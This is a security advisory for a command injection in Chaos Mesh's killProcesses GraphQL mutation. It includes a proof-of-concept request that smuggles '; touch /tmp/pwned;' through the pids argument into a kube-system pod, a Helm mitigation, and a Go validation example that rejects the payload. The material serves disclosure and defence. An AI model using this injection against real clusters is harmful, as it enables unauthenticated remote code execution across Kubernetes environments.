OS command injection in Chaos Mesh via the killProcesses mutation
Affected package: github.com/chaos-mesh/chaos-mesh
Affected versions: (,2.7.2]
The killProcesses mutation in Chaos Controller Manager is vulnerable to OS command injection. In conjunction with CVE-2025-59358, this allows unauthenticated in-cluster attackers to perform remote code execution across the cluster.
{"query": "mutation KillProcessesInPod {
  pod(ns: \"kube-system\", name: \"kube-proxy-9trk4\") {
    killProcesses(pids: [\"1\", \"; touch /tmp/pwned;\"]) {
      pid command } } }"}
If upgrading Chaos Mesh to the fixed version is not possible, re-deploy the Helm chart with the chaosctl tool and its port disabled:
helm install chaos-mesh chaos-mesh/chaos-mesh -n=chaos-mesh --version 2.7.x --set enableCtrlServer=false
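
One way a resolver can treat the pids argument so that a request like the one above is rejected, as an added example (not Chaos Mesh's code or its actual fix). It assumes the pid strings would otherwise end up in a command line; the function name killArgv and the sample inputs are hypothetical.

```go
package main

import (
	"fmt"
	"strconv"
)

// pidMax is the largest PID Linux can be configured to hand out (2^22).
const pidMax = 4194304

// killArgv validates every caller-supplied pid and returns an argument
// vector meant to be passed to an exec API directly, so no shell ever
// parses caller text. The whole request fails on the first bad element.
func killArgv(raw []string) ([]string, error) {
	if len(raw) == 0 {
		return nil, fmt.Errorf("no pids supplied")
	}
	argv := []string{"kill"}
	for i, s := range raw {
		if s == "" || len(s) > 7 {
			return nil, fmt.Errorf("pids[%d]: bad length", i)
		}
		// ASCII digits only: no sign, whitespace or shell metacharacter.
		for _, c := range s {
			if c < '0' || c > '9' {
				return nil, fmt.Errorf("pids[%d]: not a decimal number", i)
			}
		}
		n, err := strconv.Atoi(s)
		if err != nil || n < 1 || n > pidMax {
			return nil, fmt.Errorf("pids[%d]: out of range", i)
		}
		// Re-serialise from the integer so only canonical digits go out.
		argv = append(argv, strconv.Itoa(n))
	}
	return argv, nil
}

func main() {
	// Constructed inputs; the second is the pids list from the request above.
	for _, in := range [][]string{{"1", "4242"}, {"1", "; touch /tmp/pwned;"}} {
		argv, err := killArgv(in)
		fmt.Printf("%q -> argv=%q err=%v\n", in, argv, err)
	}
}
```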